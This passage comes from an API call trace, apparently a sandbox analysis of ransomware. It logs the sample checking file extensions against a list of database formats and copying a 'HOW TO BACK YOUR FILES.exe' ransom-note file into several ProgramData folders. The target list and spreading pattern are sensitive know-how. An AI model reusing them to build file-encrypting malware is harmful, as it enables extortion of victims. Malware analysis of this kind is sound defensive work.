lpString2="4dd") returned 1 [0085.462] lstrlenW (lpString="4dl") returned 3 [0085.462] lstrcmpiW (lpString1="sdf", lpString2="4dl") returned 1 [0085.462] lstrlenW (lpString="^^^") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="^^^") returned 1 [0085.463] lstrlenW (lpString="abs") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="abs") returned 1 [0085.463] lstrlenW (lpString="abx") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="abx") returned 1 [0085.463] lstrlenW (lpString="accdb") returned 5 [0085.463] lstrcmpiW (lpString1="e.sdf", lpString2="accdb") returned 1 [0085.463] lstrlenW (lpString="accdc") returned 5 [0085.463] lstrcmpiW (lpString1="e.sdf", lpString2="accdc") returned 1 [0085.463] lstrlenW (lpString="accde") returned 5 [0085.463] lstrcmpiW (lpString1="e.sdf", lpString2="accde") returned 1 [0085.463] lstrlenW (lpString="accdr") returned 5 [0085.463] lstrcmpiW (lpString1="e.sdf", lpString2="accdr") returned 1 [0085.463] lstrlenW (lpString="accdt") returned 5 [0085.463] lstrcmpiW (lpString1="e.sdf", lpString2="accdt") returned 1 [0085.463] lstrlenW (lpString="accdw") returned 5 [0085.463] lstrcmpiW (lpString1="e.sdf", lpString2="accdw") returned 1 [0085.463] lstrlenW (lpString="accft") returned 5 [0085.463] lstrcmpiW (lpString1="e.sdf", lpString2="accft") returned 1 [0085.463] lstrlenW (lpString="adb") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="adb") returned 1 [0085.463] lstrlenW (lpString="adb") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="adb") returned 1 [0085.463] lstrlenW (lpString="ade") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="ade") returned 1 [0085.463] lstrlenW (lpString="adf") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="adf") returned 1 [0085.463] lstrlenW (lpString="adn") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="adn") returned 1 [0085.463] lstrlenW (lpString="adp") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="adp") returned 1 [0085.463] lstrlenW (lpString="alf") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="alf") returned 1 [0085.463] lstrlenW (lpString="ask") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="ask") returned 1 [0085.463] lstrlenW (lpString="btr") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="btr") returned 1 [0085.463] lstrlenW (lpString="cat") returned 3 [0085.463] lstrcmpiW (lpString1="sdf", lpString2="cat") returned 1 [0085.464] lstrlenW (lpString="cdb") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="cdb") returned 1 [0085.464] lstrlenW (lpString="ckp") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="ckp") returned 1 [0085.464] lstrlenW (lpString="cma") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="cma") returned 1 [0085.464] lstrlenW (lpString="cpd") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="cpd") returned 1 [0085.464] lstrlenW (lpString="dacpac") returned 6 [0085.464] lstrcmpiW (lpString1="se.sdf", lpString2="dacpac") returned 1 [0085.464] lstrlenW (lpString="dad") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="dad") returned 1 [0085.464] lstrlenW (lpString="dadiagrams") returned 10 [0085.464] lstrcmpiW (lpString1="tabase.sdf", lpString2="dadiagrams") returned 1 [0085.464] lstrlenW (lpString="daschema") returned 8 [0085.464] lstrcmpiW (lpString1="base.sdf", lpString2="daschema") returned -1 [0085.464] lstrlenW (lpString="db-journal") returned 10 [0085.464] lstrcmpiW (lpString1="tabase.sdf", lpString2="db-journal") returned 1 [0085.464] lstrlenW (lpString="db-shm") returned 6 [0085.464] lstrcmpiW (lpString1="se.sdf", lpString2="db-shm") returned 1 [0085.464] lstrlenW (lpString="db-wal") returned 6 [0085.464] lstrcmpiW (lpString1="se.sdf", lpString2="db-wal") returned 1 [0085.464] lstrlenW (lpString="dbc") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="dbc") returned 1 [0085.464] lstrlenW (lpString="dbs") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="dbs") returned 1 [0085.464] lstrlenW (lpString="dbt") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="dbt") returned 1 [0085.464] lstrlenW (lpString="dbv") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="dbv") returned 1 [0085.464] lstrlenW (lpString="dbx") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="dbx") returned 1 [0085.464] lstrlenW (lpString="dcb") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="dcb") returned 1 [0085.464] lstrlenW (lpString="dct") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="dct") returned 1 [0085.464] lstrlenW (lpString="dcx") returned 3 [0085.464] lstrcmpiW (lpString1="sdf", lpString2="dcx") returned 1 [0085.465] lstrlenW (lpString="ddl") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="ddl") returned 1 [0085.465] lstrlenW (lpString="dlis") returned 4 [0085.465] lstrcmpiW (lpString1=".sdf", lpString2="dlis") returned -1 [0085.465] lstrlenW (lpString="dp1") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="dp1") returned 1 [0085.465] lstrlenW (lpString="dqy") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="dqy") returned 1 [0085.465] lstrlenW (lpString="dsk") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="dsk") returned 1 [0085.465] lstrlenW (lpString="dsn") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="dsn") returned 1 [0085.465] lstrlenW (lpString="dtsx") returned 4 [0085.465] lstrcmpiW (lpString1=".sdf", lpString2="dtsx") returned -1 [0085.465] lstrlenW (lpString="dxl") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="dxl") returned 1 [0085.465] lstrlenW (lpString="eco") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="eco") returned 1 [0085.465] lstrlenW (lpString="ecx") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="ecx") returned 1 [0085.465] lstrlenW (lpString="edb") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="edb") returned 1 [0085.465] lstrlenW (lpString="epim") returned 4 [0085.465] lstrcmpiW (lpString1=".sdf", lpString2="epim") returned -1 [0085.465] lstrlenW (lpString="fcd") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="fcd") returned 1 [0085.465] lstrlenW (lpString="fdb") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="fdb") returned 1 [0085.465] lstrlenW (lpString="fic") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="fic") returned 1 [0085.465] lstrlenW (lpString="flexolibrary") returned 12 [0085.465] lstrcmpiW (lpString1="Database.sdf", lpString2="flexolibrary") returned -1 [0085.465] lstrlenW (lpString="fm5") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="fm5") returned 1 [0085.465] lstrlenW (lpString="fmp") returned 3 [0085.465] lstrcmpiW (lpString1="sdf", lpString2="fmp") returned 1 [0085.465] lstrlenW (lpString="fmp12") returned 5 [0085.465] lstrcmpiW (lpString1="e.sdf", lpString2="fmp12") returned -1 [0085.466] lstrlenW (lpString="fmpsl") returned 5 [0085.466] lstrcmpiW (lpString1="e.sdf", lpString2="fmpsl") returned -1 [0085.466] lstrlenW (lpString="fol") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="fol") returned 1 [0085.466] lstrlenW (lpString="fp3") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="fp3") returned 1 [0085.466] lstrlenW (lpString="fp4") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="fp4") returned 1 [0085.466] lstrlenW (lpString="fp5") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="fp5") returned 1 [0085.466] lstrlenW (lpString="fp7") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="fp7") returned 1 [0085.466] lstrlenW (lpString="fpt") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="fpt") returned 1 [0085.466] lstrlenW (lpString="frm") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="frm") returned 1 [0085.466] lstrlenW (lpString="gdb") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="gdb") returned 1 [0085.466] lstrlenW (lpString="gdb") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="gdb") returned 1 [0085.466] lstrlenW (lpString="grdb") returned 4 [0085.466] lstrcmpiW (lpString1=".sdf", lpString2="grdb") returned -1 [0085.466] lstrlenW (lpString="gwi") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="gwi") returned 1 [0085.466] lstrlenW (lpString="hdb") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="hdb") returned 1 [0085.466] lstrlenW (lpString="his") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="his") returned 1 [0085.466] lstrlenW (lpString="ib") returned 2 [0085.466] lstrcmpiW (lpString1="df", lpString2="ib") returned -1 [0085.466] lstrlenW (lpString="idb") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="idb") returned 1 [0085.466] lstrlenW (lpString="ihx") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="ihx") returned 1 [0085.466] lstrlenW (lpString="itdb") returned 4 [0085.466] lstrcmpiW (lpString1=".sdf", lpString2="itdb") returned -1 [0085.466] lstrlenW (lpString="itw") returned 3 [0085.466] lstrcmpiW (lpString1="sdf", lpString2="itw") returned 1 [0085.467] lstrlenW (lpString="jet") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="jet") returned 1 [0085.467] lstrlenW (lpString="jtx") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="jtx") returned 1 [0085.467] lstrlenW (lpString="kdb") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="kdb") returned 1 [0085.467] lstrlenW (lpString="kexi") returned 4 [0085.467] lstrcmpiW (lpString1=".sdf", lpString2="kexi") returned -1 [0085.467] lstrlenW (lpString="kexic") returned 5 [0085.467] lstrcmpiW (lpString1="e.sdf", lpString2="kexic") returned -1 [0085.467] lstrlenW (lpString="kexis") returned 5 [0085.467] lstrcmpiW (lpString1="e.sdf", lpString2="kexis") returned -1 [0085.467] lstrlenW (lpString="lgc") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="lgc") returned 1 [0085.467] lstrlenW (lpString="lwx") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="lwx") returned 1 [0085.467] lstrlenW (lpString="maf") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="maf") returned 1 [0085.467] lstrlenW (lpString="maq") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="maq") returned 1 [0085.467] lstrlenW (lpString="mar") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="mar") returned 1 [0085.467] lstrlenW (lpString="marshal") returned 7 [0085.467] lstrcmpiW (lpString1="ase.sdf", lpString2="marshal") returned -1 [0085.467] lstrlenW (lpString="mas") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="mas") returned 1 [0085.467] lstrlenW (lpString="mav") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="mav") returned 1 [0085.467] lstrlenW (lpString="maw") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="maw") returned 1 [0085.467] lstrlenW (lpString="mdbhtml") returned 7 [0085.467] lstrcmpiW (lpString1="ase.sdf", lpString2="mdbhtml") returned -1 [0085.467] lstrlenW (lpString="mdn") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="mdn") returned 1 [0085.467] lstrlenW (lpString="mdt") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="mdt") returned 1 [0085.467] lstrlenW (lpString="mfd") returned 3 [0085.467] lstrcmpiW (lpString1="sdf", lpString2="mfd") returned 1 [0085.468] lstrlenW (lpString="mpd") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="mpd") returned 1 [0085.468] lstrlenW (lpString="mrg") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="mrg") returned 1 [0085.468] lstrlenW (lpString="mud") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="mud") returned 1 [0085.468] lstrlenW (lpString="mwb") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="mwb") returned 1 [0085.468] lstrlenW (lpString="myd") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="myd") returned 1 [0085.468] lstrlenW (lpString="ndf") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="ndf") returned 1 [0085.468] lstrlenW (lpString="nnt") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="nnt") returned 1 [0085.468] lstrlenW (lpString="nrmlib") returned 6 [0085.468] lstrcmpiW (lpString1="se.sdf", lpString2="nrmlib") returned 1 [0085.468] lstrlenW (lpString="ns2") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="ns2") returned 1 [0085.468] lstrlenW (lpString="ns3") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="ns3") returned 1 [0085.468] lstrlenW (lpString="ns4") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="ns4") returned 1 [0085.468] lstrlenW (lpString="nsf") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="nsf") returned 1 [0085.468] lstrlenW (lpString="nv") returned 2 [0085.468] lstrcmpiW (lpString1="df", lpString2="nv") returned -1 [0085.468] lstrlenW (lpString="nv2") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="nv2") returned 1 [0085.468] lstrlenW (lpString="nwdb") returned 4 [0085.468] lstrcmpiW (lpString1=".sdf", lpString2="nwdb") returned -1 [0085.468] lstrlenW (lpString="nyf") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="nyf") returned 1 [0085.468] lstrlenW (lpString="odb") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="odb") returned 1 [0085.468] lstrlenW (lpString="odb") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="odb") returned 1 [0085.468] lstrlenW (lpString="oqy") returned 3 [0085.468] lstrcmpiW (lpString1="sdf", lpString2="oqy") returned 1 [0085.469] lstrlenW (lpString="ora") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="ora") returned 1 [0085.469] lstrlenW (lpString="orx") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="orx") returned 1 [0085.469] lstrlenW (lpString="owc") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="owc") returned 1 [0085.469] lstrlenW (lpString="p96") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="p96") returned 1 [0085.469] lstrlenW (lpString="p97") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="p97") returned 1 [0085.469] lstrlenW (lpString="pan") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="pan") returned 1 [0085.469] lstrlenW (lpString="pdb") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="pdb") returned 1 [0085.469] lstrlenW (lpString="pdm") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="pdm") returned 1 [0085.469] lstrlenW (lpString="pnz") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="pnz") returned 1 [0085.469] lstrlenW (lpString="qry") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="qry") returned 1 [0085.469] lstrlenW (lpString="qvd") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="qvd") returned 1 [0085.469] lstrlenW (lpString="rbf") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="rbf") returned 1 [0085.469] lstrlenW (lpString="rctd") returned 4 [0085.469] lstrcmpiW (lpString1=".sdf", lpString2="rctd") returned -1 [0085.469] lstrlenW (lpString="rod") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="rod") returned 1 [0085.469] lstrlenW (lpString="rodx") returned 4 [0085.469] lstrcmpiW (lpString1=".sdf", lpString2="rodx") returned -1 [0085.469] lstrlenW (lpString="rpd") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="rpd") returned 1 [0085.469] lstrlenW (lpString="rsd") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="rsd") returned 1 [0085.469] lstrlenW (lpString="sas7bdat") returned 8 [0085.469] lstrcmpiW (lpString1="base.sdf", lpString2="sas7bdat") returned -1 [0085.469] lstrlenW (lpString="sbf") returned 3 [0085.469] lstrcmpiW (lpString1="sdf", lpString2="sbf") returned 1 [0085.469] lstrlenW (lpString="scx") returned 3 [0085.470] lstrcmpiW (lpString1="sdf", lpString2="scx") returned 1 [0085.470] lstrlenW (lpString="sdb") returned 3 [0085.470] lstrcmpiW (lpString1="sdf", lpString2="sdb") returned 1 [0085.470] lstrlenW (lpString="sdc") returned 3 [0085.470] lstrcmpiW (lpString1="sdf", lpString2="sdc") returned 1 [0085.470] lstrlenW (lpString="sdf") returned 3 [0085.470] lstrcmpiW (lpString1="sdf", lpString2="sdf") returned 0 [0085.470] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0085.470] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.470] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a50 [0085.470] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound") returned="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound" [0085.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df8f0 | out: hHeap=0x2b0000) returned 1 [0085.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0085.470] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound") returned 41 [0085.470] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound" | out: lpString1="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound") returned="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound" [0085.470] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.470] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\rac\\outbound\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.471] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.471] GetLastError () returned 0x0 [0085.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.471] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.471] CloseHandle (hObject=0x120) returned 1 [0085.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.471] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.471] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.471] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.471] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.471] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.471] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.471] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.471] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.471] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.471] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.471] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c59d4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.471] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.471] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c59d4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0085.471] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.472] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a30 [0085.472] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform" [0085.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0085.472] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 61 [0085.472] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform" | out: lpString1="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform" [0085.472] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.472] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.472] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.472] GetLastError () returned 0x0 [0085.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.473] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.473] CloseHandle (hObject=0x120) returned 1 [0085.473] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.473] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.473] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.473] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.473] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.473] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.473] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.473] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.473] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.473] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.473] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.473] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c5c3640, 